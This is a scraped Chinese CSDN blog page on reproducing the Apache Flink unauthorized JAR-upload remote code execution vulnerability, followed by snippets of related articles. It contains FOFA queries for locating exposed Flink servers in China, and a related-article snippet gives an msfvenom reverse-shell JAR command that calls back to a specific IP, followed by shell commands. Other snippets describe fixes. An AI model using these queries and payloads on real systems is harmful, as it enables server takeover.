Apache Flink 未授权访问+远程代码执行

最新推荐文章于 2025-06-17 11:17:35 发布

原创

最新推荐文章于 2025-06-17 11:17:35 发布 · 2.4k 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#Apache Flink #Flink未授权访问

Apache Flink 未授权访问+远程代码执行

作者：Birdman-one
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YCVaeh4G-1607694893877)(https://imges-1255470970.cos.ap-nanjing.myqcloud.com/1607693967_20201211213914774_24928.png)]

前言

近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞，影响范围：<= 1.9.1(最新版本)
此次复现就是通过版本Version: 1.10.1进行复现利用。

FOFA

FOFA 语句
app="Apache-Flink" && country="CN"
app="Apache-Flink" && country="CN" && region="HK"

国内还是很多使用 Apache Flink 的，大概有1K+的数量左右

漏洞复现

1、这里随便搞个站打开进行复现，打开以后就张这样子。

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Birdman-one

关注关注

1
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Apache Flink 未授权远程代码执行提权（实战）

失心少年

12-04

1428

1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马下面展示一些。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置，并进行监听下面展示一些。 3、上传刚才生成的木马，并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权

Apache Flink (最新版本) 远程代码执行

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

05-04

989

路虽远，行则将至；事虽难，做则必成

参与评论您还未登录，请先登录后发表或查看评论

Apache-Flink未授权访问高危漏洞修复

weixin_38255219的博客

07-12

3465

由于flink没有鉴权的设置，使用使用 htpasswd 工具+服务器系统防火墙设置，才能禁用默认对外访问的8081端口，使用用户名+密码实现安全验证登录flink web ui。

[漏洞复现]Apache Flink未授权访问+远程代码命令执行

cj_Hydra's Blog

10-24

3062

前言：近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞，影响范围：<= 1.9.1(最新版本) 但是作者通过测试在版本Version: 1.11.2也是受影响的，此次复现就是通过版本Version: 1.11.2进行复现利用。漏洞复现：首先通过msfveon生成jar包，命令： msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar 然

Apache Flink未授权漏洞学习

最新发布

weixin_42051376的博客

06-17

1058

Apache Flink存在严重未授权访问漏洞(CVE-2020-17518/17519)，攻击者可利用Web Dashboard(默认8081端口)无需认证上传恶意JAR文件或构造路径遍历Payload，实现远程代码执行(RCE)或敏感文件读取。漏洞影响版本包括1.5.1-1.11.2，利用工具如Metasploit可轻易获取服务器Root权限。修复方案包括升级至1.11.3+版本、启用身份认证、限制网络访问及关闭JAR上传功能等。该漏洞风险极高，运维人员需立即排查并加固相关系统。

【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞

RobinWang的博客

01-15

8782

【漏洞修复】修复 Apache Flink Web Dashboard 未授权访问致远程命令执行漏洞介绍攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击，中招会使服务器占满CPU沦为挖矿机，非常猖獗通过反编译得到的恶意代码： package com.example; import java.io.IOException; public class Mai...

Apache Flink漏洞复现(未授权访问&上传jar包getshell)

qq_43244584的博客

01-26

6641

Apache Flink漏洞复现(未授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎，其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎，Flink提供了诸多更高抽象层的API以便用户编写分布式任务。二、漏洞介绍 Apache Flink Dashboard默认没有用户权限认证攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包可远程执行任意系统命令获取服务器权限

Apache Flink 未授权访问+远程代码执行.pdf

04-30

### Apache Flink 未授权访问与远程代码执行漏洞解析及防范 #### 一、漏洞概述 **Apache Flink**是一款高性能、分布式、流处理引擎，它支持事件驱动的数据流处理和批处理作业。由于其出色的性能表现，在大数据处理...

getshell之Apache Flink 未授权访问+远程代码执行

MoCoCN的博客

11-12

970

@[MoCo](getshell之Apache Flink 未授权访问+远程代码执行) 0x00前言又是领导不在的一天，今天兄弟们就是天，随着工作的时间越来越久对知识的渴望也越来越强大，最近几天在看反弹shell的一些文章，也学习到了一些反弹shell技巧和姿势，由于环境的问题，暂不能记录文本，虽说都是一些基本的吧，慢慢来嘛，看着文章，吐槽的国内某知名的培训机构，努力的汲取知识，看着看着就累了，有点看不动了，但是还是想学，于是决定去看看adminxe大佬的博客上看看有没有发布新的文章，看见大佬昨天发布了一

2020-10-24Apache Flink未授权访问-远程代码命令执行-复现

thelostworld

10-24

1203

好久没更新了，今天趁1024更新一篇，最近工作中遇到这个漏洞，今天自己来做一下这个漏洞复现。 Apache Flink未授权访问-远程代码命令执行-复现一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台，直接上传木马jar包，可远程执行任意系统命令获取服务器权限，风险极大。二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..

Apache-flink 未授权访问任意jar包上传反弹shell.MD

04-12

Apache-flink 未授权访问任意jar包上传反弹shell

flinkdashboard未授权

someInNeed的博客

10-16

1905

访问 http://172.16.150.xx:8084。然后目录在/usr/local/nginx。flinkwebui 增加账号密码。添加配置完成以后，重启nginx，修改flink.conf。配置nginx.conf。

Apache Flink未授权访问-远程代码命令执行-复现

thelostworld

10-24

869

好久没更新了，今天趁1024更新一篇，最近工作中遇到这个漏洞，今天自己来做一下这个漏洞复现。Apache Flink未授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过未授权的Flink Dashboard控制台，直接上传木马jar包，可远程执行任意系统命令获取服务器权限，风险极大。二、影响版本Apache Flink &...

Apache Flink 未授权远程代码执行检查

weixin_42299610的博客

06-07

2340

Apache Flink 未授权远程代码执行检查

【CVE】CVE-2020-17518 & CVE-2020-17519：Flink 任意文件上传 & 未授权访问

边扯边淡

05-09

2954

起序：漏扫完看报告的时候发现的，复现学习一下。一、靶场环境使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub：https://github.com/vulhub/vulhub 1、漏洞描述：任意文件上传 & 未授权访问 CVE 编号名称危害 CVE-2020-17518 任意文件上传应用系统在文件上传功能处对用户上传.

攻击未授权访问的 Flink 集群

3569

08-19

851

Flink 是一个针对流数据和批数据的分布式处理引擎，与 Storm 一起广泛应用于分布式实时计算场景中，且在某些场景下 Flink 性能要优于 Storm。然而 Flink 默认提供的 Web UI 却不支持鉴权，这就引发了非常明显的未授权问题。 Flink Web UI 在 macOS 上简单安装一个单节点 Flink，直接使用 Homebrew。 brew install apac...

flink web ui未授权漏洞处理

jiedaodezhuti的博客

02-27

918

sudo htpasswd -c /etc/nginx/conf.d/.passwd flink # 需安装httpd-tools‌:ml-citation{ref="1,4" data="citationList"}# 指向Flink实际端口‌:ml-citation{ref="2" data="citationList"}# 基础认证配置‌:ml-citation{ref="1,4" data="citationList"}http://IP地址:8082 #8082未nginx代理端口。

掌握Apache Flink：从 Packt 发布的代码文件学习

“Mastering-Apache-Flink”包含的代码库是该书的学习资源，供读者下载和使用。这些代码文件是完成书籍中所有练习和例子所必需的，它们允许用户亲自动手实践以加深理解。通过这些项目文件，读者能够看到在不同场景下...